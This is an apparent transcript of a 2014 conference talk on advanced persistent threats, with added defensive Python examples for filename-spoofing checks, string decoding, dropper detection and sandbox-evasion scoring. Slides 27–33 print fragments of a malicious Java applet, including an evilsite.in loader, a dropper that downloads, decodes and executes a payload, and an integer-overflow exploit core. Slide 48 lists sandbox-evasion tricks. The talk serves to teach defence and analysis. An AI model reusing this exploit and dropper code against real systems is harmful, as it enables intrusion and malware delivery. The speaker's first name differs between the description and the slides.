the magic world of apt 0.6 - pompili
DESCRIPTION
Slides from Simone Pompili talk @Codemotion Roma 2014
TRANSCRIPT
![Page 1: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/1.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
![Page 2: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/2.jpg)
Attacker Math (Dino Dai Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
![Page 3: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/3.jpg)
How does an attack unfold?
<#1>
<#2>
<#3>
![Page 4: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/4.jpg)
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
![Page 5: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/5.jpg)
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
<2000>
8.7 billion dollars
![Page 6: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/6.jpg)
<2001> The Nimda Style
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability
TFTP Server UDP:69
RICHED20.DLL
Microsoft Office 2000 DLL Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability
635 million dollars
![Page 7: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/7.jpg)
SQL Server 2000 Desktop Engine
75,000 computers infected in just 10 minutes
payload of only 376 bytes (memory-resident only)
1.2 billion dollars
![Page 8: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/8.jpg)
22.6 billion dollars
DDoS against www.sco.com
Upload&Execute 0x85 0x13 0x3c 0x9e 0xa2
Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
![Page 9: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/9.jpg)
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Shopping For Zero-Days
![Page 10: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/10.jpg)
The most complex malware in history
> 20MB in size (900KB main program/dropper + 16 modules detected to date)
> 80 domains used as Command and Control systems
> Spread via USB stick (Infectmedia)
> Bluetooth device enumeration (Beetlejuice)
> Audio recording (Microbe)
> Windows Update MITM (Munch & Gadget)
MD5 Collision Attack
![Page 11: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/11.jpg)
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
![Page 12: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/12.jpg)
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
![Page 13: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/13.jpg)
Advanced Persistent Threats 101
> Trust Exploitation
Social Engineering, Spear Phishing, Botnet, Drive-to-Click Strategy
![Page 14: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/14.jpg)
> Trust Exploitation
> Client Exploitation
Exploit Pack (e.g. Neutrino), 0-Day
Advanced Persistent Threats 101
![Page 15: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/15.jpg)
> Trust Exploitation
> Client Exploitation
> Multi-Stage
Shellcoding, Dropper/Downloader, Modules (e.g. RAT, Infostealer, etc.), Good Covert Channel
Advanced Persistent Threats 101
![Page 16: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/16.jpg)
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
Email, Web Sites, Botnet, Physical (USB)
Advanced Persistent Threats 101
![Page 17: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/17.jpg)
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
> Resiliency
Camouflaging, Command & Control, Good Covert Channel
Advanced Persistent Threats 101
![Page 18: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/18.jpg)
Make or Buy?
![Page 19: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/19.jpg)
The Botnet Choice
![Page 20: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/20.jpg)
Drive-to-Click <#1>
![Page 21: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/21.jpg)
Drive-to-Click <#2>
![Page 22: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/22.jpg)
Drive-to-Click <#3>
![Page 23: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/23.jpg)
Drive-to-Click <#4>
![Page 24: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/24.jpg)
Drive-to-Click <#5>
![Page 25: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/25.jpg)
Trick#1> Playing with extensions
RLO Unicode control character
![Page 26: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/26.jpg)
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
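As an added illustration of Trick#1 and Trick#2 together (editor-added example code, not from the talk or from any project it cites): a Python check that a download gateway or mail filter could apply to a server's Content-Disposition response header. It extracts the filename the browser will use (RFC 5987 `filename*=` first, then plain `filename=`), then compares the extension the user will see with the extension the OS will actually execute once a right-to-left override (U+202E, the RLO character named on the previous slide) has reordered the display. The header values and filenames are constructed samples, and the function names are my own.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Unicode bidirectional controls: they change how a name is *displayed*, not the
# bytes the filesystem or the program loader actually uses.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}

# Extensions a gateway would normally quarantine regardless of how they look.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".jar", ".hta", ".lnk", ".msi"}

# RFC 5987 form:  filename*=charset'lang'percent-encoded   (preferred by browsers)
_FILENAME_STAR = re.compile(r"filename\*\s*=\s*([\w-]+)'[\w-]*'([^;]+)", re.I)
# RFC 2616/6266 form:  filename="quoted"  or  filename=token
_FILENAME = re.compile(r'filename\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;\s]+))', re.I)


def filename_from_content_disposition(header: str) -> Optional[str]:
    """Return the filename a browser would take from a Content-Disposition value."""
    m = _FILENAME_STAR.search(header)
    if m:
        charset, value = m.group(1), m.group(2).strip()
        try:
            return unquote(value, encoding=charset, errors="replace")
        except LookupError:  # unknown charset name: fall back to UTF-8
            return unquote(value, errors="replace")
    m = _FILENAME.search(header)
    if m:
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        return raw.replace('\\"', '"')
    return None


def displayed_name(name: str) -> str:
    """Approximate what a GUI file list shows: text after an RLO is drawn
    right-to-left until a PDF closes the override or the string ends.
    Simplification: a single RLO, which is all the extension trick needs."""
    i = name.find("\u202e")
    if i < 0:
        return name
    rest = name[i + 1:]
    j = rest.find("\u202c")
    tail, after = (rest, "") if j < 0 else (rest[:j], rest[j + 1:])
    return name[:i] + tail[::-1] + after


def _ext(name: str) -> str:
    return name[name.rfind("."):].lower() if "." in name else ""


def analyze_filename(name: str) -> dict:
    """Compare the name the OS will use with the name a user will see."""
    controls = [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]
    actual = "".join(c for c in name if c not in BIDI_CONTROLS)
    shown = displayed_name(name)
    return {
        "actual_name": actual,
        "displayed_name": shown,
        "actual_ext": _ext(actual),
        "displayed_ext": _ext(shown),
        "bidi_controls": controls,
        # Flag either trick: hidden directionality controls, or an executable
        # extension whatever the user is shown.
        "suspicious": bool(controls) or _ext(actual) in EXECUTABLE_EXTS,
    }


def check_download(header: str) -> dict:
    """Run both checks on a server's Content-Disposition response header."""
    name = filename_from_content_disposition(header)
    if name is None:
        return {"filename": None, "suspicious": False}
    return {"filename": name, **analyze_filename(name)}


if __name__ == "__main__":
    # Constructed sample headers (not taken from the talk).
    for h in ('attachment; filename="report\u202efdp.exe"',
              "attachment; filename*=UTF-8''r%C3%A9sum%C3%A9.pdf"):
        print(check_download(h))
```

The first sample is the classic case from the slide: the bytes say `reportfdp.exe`, the screen says `reportexe.pdf`. A filter that only looks at the rendered name, or only at the Content-Type, misses it; comparing `actual_ext` with `displayed_ext`, and refusing any name that carries a bidirectional control at all, does not.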
![Page 27: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/27.jpg)
<applet codebase="http://blahblah.evilsite.in/hiddenpath/"
archive="http://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9" code="rgmiv">
Trick#3> Client Exploiting
![Page 28: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/28.jpg)
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
![Page 29: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/29.jpg)
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>u\b:6+7>\0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
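As an added example (editor-added, not code from the talk), the string decoder shown above reimplemented in Python for an analyst: it decodes the slide's own literal with the 0x5b key from idzfihff(), and it also brute-forces all 256 single-byte keys for the common case where the decoder routine has been renamed again and is hard to locate in the decompiled class. Function names are mine; the only input is the literal printed on the slide.

```python
import re

# The obfuscated literal exactly as it appears in the decompiled applet on the
# slide; Java's \b and \026 escapes denote the same bytes in Python.
SAMPLE = "1:-:u:,/u26:<>u\b:6+7>\0264?>7"


def xor_decode(s: str, key: int) -> str:
    """Same operation as the applet's n()/idzfihff(): each char XOR one byte.
    XOR is its own inverse, so the same call encodes and decodes."""
    return "".join(chr(ord(c) ^ key) for c in s)


# Fully-qualified Java class name, e.g. java.awt.image.SampleModel
_JAVA_NAME = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$", re.ASCII)


def candidate_keys(s: str) -> list:
    """Brute-force the 256 single-byte keys and keep those whose output looks
    like a Java class name. Useful when the decoder routine is not at hand."""
    return [k for k in range(256) if _JAVA_NAME.match(xor_decode(s, k))]


def decode_all(literals, key: int) -> dict:
    """Decode a batch of obfuscated literals pulled from a decompiled class,
    so the reflection calls (Class.forName etc.) can be read as plain names."""
    return {lit: xor_decode(lit, key) for lit in literals}


if __name__ == "__main__":
    print(candidate_keys(SAMPLE))
    print(xor_decode(SAMPLE, 0x5b))
```

Decoding the slide's literal yields a class name from java.awt.image, which is what the reflection helpers on the next slides feed to Class.forName: the string obfuscation exists so that those class names never appear in the constant pool of the applet, where a signature scanner would find them.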
![Page 30: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/30.jpg)
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) throws Exception {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) throws Exception {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
![Page 31: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/31.jpg)
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
![Page 32: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/32.jpg)
...
private static void lcsqyrgtbct(String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel = Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos = new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class
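As an added example (editor-added, not from the talk), detection logic for the two launch paths in the dropper above: the JVM spawning cmd.exe /C on a file in the user's temp directory (the Runtime.exec branch), and a ~tmf-prefixed temp file, the name File.createTempFile("~tmf", null) produces, running as a process (either via cmd.exe or directly through the ProcessBuilder fallback). The process-creation records are constructed samples in a simplified Sysmon-like key="value" layout; the rule names and the record format are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records (not real telemetry), in the style of a
# simplified Sysmon "process create" event: key="value" pairs on one line.
SAMPLE_EVENTS = [
    r'ts=2014-04-11T10:02:13Z parent="C:\Program Files\Java\jre7\bin\java.exe" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /C C:\Users\alice\AppData\Local\Temp\~tmf4123.tmp"',
    r'ts=2014-04-11T10:02:14Z parent="C:\Windows\System32\cmd.exe" image="C:\Users\alice\AppData\Local\Temp\~tmf4123.tmp" cmdline="C:\Users\alice\AppData\Local\Temp\~tmf4123.tmp"',
    r'ts=2014-04-11T10:05:00Z parent="C:\Windows\explorer.exe" image="C:\Program Files\Java\jre7\bin\javaw.exe" cmdline="javaw.exe -jar app.jar"',
    r'ts=2014-04-11T10:06:30Z parent="C:\Program Files\Java\jre7\bin\javaw.exe" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /C C:\build\run_tests.bat"',
]

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" record into a dict (quoted or bare values)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _KV.finditer(line)}


JAVA_IMAGES = {"java.exe", "javaw.exe"}
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _in_temp(path: str) -> bool:
    return any(t in path.lower() for t in TEMP_DIRS)


def classify(ev: Dict[str, str]) -> List[str]:
    """Rules mirroring the dropper's launch paths on the slide."""
    parent = _base(ev.get("parent", ""))
    image_path = ev.get("image", "")
    image = _base(image_path)
    cmdline = ev.get("cmdline", "")
    hits = []
    # Runtime.exec("cmd.exe", "/C", <temp file>) launched from the JVM
    if parent in JAVA_IMAGES and image == "cmd.exe" and _in_temp(cmdline):
        hits.append("java_cmd_temp_payload")
    # The temp file itself running, whether via cmd.exe or ProcessBuilder
    if _in_temp(image_path) and (parent in JAVA_IMAGES or parent == "cmd.exe"):
        hits.append("temp_file_executed")
    # File.createTempFile("~tmf", null) yields names like ~tmfNNNN.tmp
    if image.startswith("~tmf"):
        hits.append("tmf_prefix")
    return hits


def scan(lines) -> List[Tuple[str, str, str]]:
    """Return (timestamp, image, rule) for every rule that fires."""
    out = []
    for line in lines:
        ev = parse_event(line)
        out.extend((ev.get("ts", "?"), ev.get("image", ""), rule) for rule in classify(ev))
    return out


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The fourth record (javaw.exe running a build script from a project directory) is there on purpose: "Java spawns cmd.exe" alone is too noisy on a developer workstation, so the rule requires the temp-directory path as well, and the `~tmf` prefix is kept as a separate, more specific rule rather than folded into the generic one.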
![Page 33: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/33.jpg)
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte[] obj10 = new byte[] {0, -1};
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
The Malware Core
http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
![Page 34: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/34.jpg)
The Cheaper Path to Exploiting
Blackhole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
RedKit
http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
![Page 35: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/35.jpg)
The InfoStealer Choice
![Page 36: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/36.jpg)
The RAT Choice
![Page 37: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/37.jpg)
Bitcoin + APT = Ransomware
![Page 38: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/38.jpg)
The Command&Control Choice <#1>
![Page 39: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/39.jpg)
The Command&Control Choice <#2>
![Page 40: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/40.jpg)
The Command&Control Choice <#3>
![Page 41: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/41.jpg)
The Command&Control Choice <#4>
![Page 42: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/42.jpg)
“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
<2012> The Antivirus Maker Confession
![Page 43: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/43.jpg)
The Way to Sandboxing
![Page 44: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/44.jpg)
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guest operating system kernel modified for tracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized hypervisor to monitor the guest operating system
<04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc.
<05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.
The Way to Sandboxing
![Page 45: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/45.jpg)
A (very) partial list of the players
> Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
![Page 46: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/46.jpg)
![Page 47: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/47.jpg)
A (completely) partial list of the evaders
![Page 48: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/48.jpg)
Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (something that needs to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
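As an added example (editor-added, not part of the talk), a scoring routine a sandbox operator could run over an API-call trace to recognise the checks listed above: volume and self-name checks, a MessageBox waiting for a click, connectivity probes and long Sleep calls, weighed against whether a payload stage was ever observed during the run. The trace is a constructed sample; the API-to-category mapping and the sleep threshold are my own assumptions, not any product's rules.

```python
from typing import Dict, List, Tuple

# Map of API calls to the evasion category from the slide they usually serve.
EVASION_APIS = {
    "Sleep": "sleep_delay", "NtDelayExecution": "sleep_delay",
    "MessageBoxA": "human_interaction", "MessageBoxW": "human_interaction",
    "GetCursorPos": "human_interaction",
    "InternetCheckConnectionA": "connectivity_check",
    "InternetGetConnectedState": "connectivity_check",
    "GetVolumeInformationW": "volume_check", "GetDiskFreeSpaceExW": "volume_check",
    "GetModuleFileNameW": "self_name_check",
    "EnumServicesStatusExW": "service_enum", "OpenSCManagerW": "service_enum",
    "GetLocalTime": "time_trigger", "GetSystemTime": "time_trigger",
}
# Calls that show the sample actually did something an analyst wants to see.
PAYLOAD_APIS = {"CreateProcessW", "WriteFile", "connect", "WinExec",
                "CreateRemoteThread", "URLDownloadToFileW"}

# Constructed trace (ms since start, API, argument), not a real sandbox report.
SAMPLE_TRACE: List[Tuple[int, str, object]] = [
    (0, "GetModuleFileNameW", "C:\\Users\\alice\\Desktop\\invoice.exe"),
    (5, "GetVolumeInformationW", "C:\\"),
    (12, "GetDiskFreeSpaceExW", 40 * 1024 ** 3),
    (20, "MessageBoxA", "Click OK to continue"),
    (35, "Sleep", 600_000),
    (600_040, "InternetCheckConnectionA", "http://example.invalid/"),
    (600_050, "Sleep", 900_000),
]


def assess(trace, sleep_budget_ms: int = 120_000) -> Dict[str, object]:
    """Score a trace: which evasion categories appeared, how much wall-clock
    time the sample tried to burn, and whether a payload stage was observed."""
    categories, total_sleep, acted = set(), 0, False
    for _ms, api, arg in trace:
        if api in EVASION_APIS:
            categories.add(EVASION_APIS[api])
            if EVASION_APIS[api] == "sleep_delay":
                total_sleep += int(arg)
        if api in PAYLOAD_APIS:
            acted = True
    if total_sleep > sleep_budget_ms or (categories and not acted):
        # Worth a second run: longer timeout, a clicker agent, a realistic disk
        verdict = "likely_evasion"
    elif acted:
        verdict = "payload_observed"
    else:
        verdict = "inconclusive"
    return {"categories": sorted(categories), "total_sleep_ms": total_sleep,
            "payload_observed": acted, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SAMPLE_TRACE))
```

The point of the verdict is the one the slide makes: a sample that probes its environment and then does nothing within the analysis window is not "clean", it is a candidate for a second run with different parameters, and the categories list says which parameter to change.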
![Page 49: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/49.jpg)
The limit of sandboxes
Minutes
def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation…
![Page 50: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/50.jpg)
Certainly better than trusting the users
![Page 51: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/51.jpg)
Domande? Italian
مطالب أية Arabic
¿Preguntas? Spanish
Questions? English
tupoQghachmey Klingon
Sindarin
Japanese
Ερωτήσεις? Greek
вопросы? Russian